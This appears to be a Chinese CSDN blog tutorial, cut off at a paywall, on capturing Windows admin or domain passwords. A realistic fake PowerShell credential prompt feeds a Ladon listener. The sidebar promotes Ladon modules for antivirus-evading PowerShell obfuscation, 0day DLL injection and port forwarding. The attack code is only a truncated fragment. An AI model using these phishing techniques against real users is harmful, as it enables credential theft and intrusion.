〖教程〗使用Ladon捕获Windonws登陆凭证

最新推荐文章于 2023-12-05 09:53:01 发布
最新推荐文章于 2023-12-05 09:53:01 发布
阅读量259 收藏 1
点赞数
分类专栏: 密码
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k8gege/article/details/108031139
版权

版本

>= Ladon 6.6.3

原理

使用PowerShell模仿Windowns登陆认证获取管理员密码,Ladon监听捕获基础认证密码。

应用场景

域控或管理员密码获取,当前权限很低又无法提权时。(有权限直接读明文或HASH)

Ladon监听

该功能模仿了MSF里的基础认证监听模块,但最大的优势在于无需占用系统大量空间和内存。
可直接部署在目标内网或VPS上,也无需复杂命令,直接输以下命令一键监听自动捕获密码。
其它用途:http://k8gege.org/Ladon/webser.html

Ladon Web 800

image

PowerShell

执行以下脚本代码,会弹出十分逼真的基础认证登陆窗口,自动获取用户名和域来提高真实性。
当然也可以使用其它脚本或语言,如JS水坑攻击、XSS截取各种WEB邮箱密码等等多种钩鱼姿势。

$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [E
最低0.47元/天 解锁文章
k8gege
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Ladon的用法
谢公子的博客
05-24 4764
项目地址:https://github.com/k8gege/Ladon 程序简介 Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置40个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、
Ladon使用
weixin_47193338的博客
04-02 3457
一、简介 Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。 二、下载地址 https://codeload.github.com/k8gege/Ladon/zip/refs/heads/master 三、使用语句 目标主机进行存活探测、MAC地址探测及主机名探测 Ladon.exe 192.168.123.0/24 ON...
Ladon8.9扫描器简明教程/用法例子
K8哥哥
05-31 8219
前言 本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。 完整文档:http://k8gege.org/Ladon 资产扫描、指纹识别、服务识别、存活主机、端口扫描 001 多协议扫描存活主机(IP、机器名、MAC地址、制造商) Ladon 192.168.1.8/24 OnlinePC 002 多协议扫描存活主机(IP、机器名、操作系统版本、开放服务) Ladon 192.168.1.8/24 OsScan 003 扫描存活主机 Ladon 192.168.1.8
教程〗Ladon以指定用户权限运行程序或命令
K8哥哥
05-30 625
前言 Ladon内置Runas允许用户用其他权限运行指定的工具和程序。系统自带Runas命令需要交互式登陆,在webshell或不支持交互式的shell下使用麻烦。而Ladon的Runas则完美解决了以上问题,支持非交互式模拟登陆指定用户运行程序或命令。 应用场景 1.本机用户密码验证(权限不够读不到帐密或HASH的情况下,验证用户是否使用某个已知密码) 2.SYSTEM权限降权,SYS权限下以用户身份执行命令,实现会话穿透,或访问特定用户的DBAPI加密数据 3.低权限用户提权,网络服务帐户或用户权限下使
Ladon简明教程 _ K8哥哥1
08-03
前言本文仅是Ladon简单使用例子,Cobalt Strike或PowerShell版用法一致。完整文档:http://k8gege.org/Ladon (ht
教程〗Ladon迷你WEB服务器/一键内网HTTP服务器
K8哥哥
05-30 1320
前言 你是否在为配置浏览器漏洞测试环境而烦恼,如配置Apache解析某种MIME测试某个漏洞 又或者在为内网机器无WEB又无法通过其它协议传输文件到内网另一台不出网的主机烦恼 还有些远程命令不支持多条语句,需要多次写入或HTTP一次性下载过去,显然都会选后者 应用场景 1.浏览器0day漏洞测试或VPS上一键部署,无需安装配置Apache 2.内网HTTP协议文件传输,如内网目标不出网不允许其它协议通过 3.Office/Word/Pdf等漏洞或远程下载SCT、HTA等格式的CS Payload 4.IP追
Ladon-master.zip
06-16
Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。
Ladon5.8大型网络渗透扫描器&源码
12-15
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.7版本内置...
ladon入侵检测系统源码C#版本
05-14
ladon入侵检测系统源码C#版本,适合从业网络安全人员或者对网络安全爱好者
Ladon study源文件
04-08
ladon 渗透工具
Ladon:大型内网渗透扫描器和Cobalt Strike,Ladon7.2内置94个模块,包含信息收集主机端口扫描服务识别密码爆破突破检测漏洞利用。漏洞检测包含MS17010SMBGhostWeblogicActiveMQTomcatStruts2,密码爆破(MysqlOracleMSSQL)FTPSSH(Linux) VNCWindows(IPCWMISMBNetbiosLDAPSmbHashWmiHashWinrm),远程执行命令(wmiexepsexecatexecsshexecwebshel​​
02-05
Ladon 7.2 20200815 程序简介 Ladon一种用于大型网络渗透性的多线程插件化综合扫描神器,包括端口扫描,服务识别,网络资产,密码爆破,高危漏洞检测以及一键GetShell,支持批量A段/ B段/ C段以及跨7.2版本内置94个功能模块,外部模块18个,通过多种协议以及方法快速获取目标网络存活主机IP,计算机名,工作组,共享资源,网卡地址,操作系统版本,网站,子域名,中间件,开放服务,路由器,数据库等信息,漏洞检测包含MS17010,SMBGhost,Weblogic,ActiveMQ,Tomcat,Struts2系列等,密码爆破13种含数据库(Mysql,Oracle ,MS
教程〗Ladon内网扫描探测Exchange服务器
K8哥哥
07-15 319
工具内网、外网均可识别,大家不要误会 WhatCms识别 通过Exchange页面特征识别 Ladon >= 7.3.2 用法 Ladon target WhatCms 例子 单IP:Ladon 192.168.1.8 WhatCms C段:Ladon 192.168.1.1/c WhatCms B段:Ladon 192.168.1.1/b WhatCms ip列表 同目录放ip txt 命令:Ladon whatcms 单个URL 命令:Ladon https://192.168.1.8 .
linux查看端口号
m0_49966615的博客
11-06 309
netstat -tunlp 查询所有端口 netstat -tunlp | grep 8080 查看8080端口 lsof -i:8080 查看8080端口
教程〗Ladon Socks代理扫描
K8哥哥
07-19 2331
Socks代理工具 windows平台 Proxifier软件是一款极其强大的socks5客户端,同时也是一款强大的站长工具。Proxifier支持TCP,UDP协议,支持Xp,Vista,Win7,支持socks4,socks5,http代理协议可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。 2020年7月proxifier官方发布最新版4.0.1修复ipv6兼容问题,以及其它很多问题。 3.42支持类似chrome这样工作的69个应用程序,修复了一些第三方应用程序的兼
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1687
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShell转EXE,EXE转PowerShell EXE->Powershell PowerS
教程〗Ladon 0day通用执行命令DLL生成器-MS17010演示
K8哥哥
09-20 1638
Ladon8.9更新功能 20210920 [+]CmdDll Windows 0day漏洞通用DLL注入生成器,生成的DLL仅5KB,非常适合0day加载 2021.9.15 [u]webscan CS保留 [u]CmdDll 去除黑框 2021.9.14 [+]CVE-2021-40444 Microsoft MSHTML远程代码执行漏洞,Office文档利用模块 影响版本: 包括Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016
Ladon for PowerShell远程加载教程
K8哥哥
08-08 711
前言 本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档 脚本可直接远程内存加载使用无须免杀,或者有些人比较喜欢的所谓无文件渗透 完整文档:http://k8gege.org/Ladon 架设WEB服务器 使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本 实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网) 将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB 远程加载MS17010漏洞扫描 powershell
教程〗Ladon/Cobalt Strike/PortTran内网反向端口转发
K8哥哥
01-05 1067
版本 Ladon >=7.8 PortTran .NET端口转发工具,支持任意权限。 https://github.com/k8gege/PortTran 外网VPS监听 PortTranS.exe 8000 338 目标内网转发 PortTranC.exe 192.168.85.169 3389 192.168.85.142 8000 VPS连接3389 mstsc /console /v:127.0.0.1:338 自己连接3389 反向转发到VPS后,我们自己的机器连接VPS监听端口即为目
CS插件——Ladon 12.0 20231201
最新发布
2301_76786857的博客
12-05 618
Cobalstrike插件Ladon一款用于大型内网渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。
x-ladon x-argus python
09-18
使用Python编程语言,并提供了许多工具和功能,用于捕获、解析和分析网络数据包。X-Argus可以用于网络流量监控、异常检测、入侵检测系统等。它具有高性能和可扩展性,并且可以与其他相关工具和系统集成。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值